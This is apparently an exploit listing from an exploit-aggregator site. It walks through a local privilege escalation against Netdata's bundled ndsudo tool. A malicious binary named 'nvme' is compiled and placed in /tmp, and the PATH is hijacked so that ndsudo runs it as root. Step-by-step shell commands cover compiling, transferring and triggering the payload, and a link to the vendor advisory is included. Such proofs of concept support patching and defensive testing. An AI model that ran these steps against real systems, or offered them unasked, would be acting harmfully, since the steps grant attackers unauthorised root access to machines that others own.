## https://sploitus.com/exploit?id=5077683C-F7E6-58BE-9375-B5A13A8782C5
# Privilege Escalation via `ndsudo` (Netdata Local Exploit)
This POC is used to exploit a vulnerable `ndsudo` utility bundled with Netdata to escalate local privileges to root. The exploit works by injecting a malicious binary into the user’s `PATH` that impersonates a trusted command (`nvme`) and is executed with root privileges by `ndsudo`.
---
## Prerequisites & Assumptions
- You have **local shell access** on the target system.
- You can execute the following command but it fails with a "not found" or similar error:
```bash
./ndsudo nvme-list
```
---
### 1. Compile the Malicious Payload
On your **attacker machine** (or the vulnerable system if it has a compiler), compile the binary (for example, from the file `poc.c` in the repository):
```bash
gcc poc.c -o nvme
```
This binary should be crafted to spawn a root shell or execute arbitrary commands with root privileges.
---
### 2. Transfer the Payload to the Target System
Move or upload the compiled `nvme` binary to a directory writable by your user, such as `/tmp`:
```bash
scp nvme user@target:/tmp/
# or use any file upload method you have
```
---
### 3. Prepare the Payload for Execution
On the **target system**, make sure the binary is executable and prepend its directory to your `PATH`:
```bash
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
```
This ensures `ndsudo` will resolve and execute your malicious `nvme` instead of the legitimate one.
---
### 4. Trigger `ndsudo` to Execute Your Payload
Run the vulnerable command to trigger `ndsudo`:
```bash
./ndsudo nvme-list
```
---
## Resources
- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93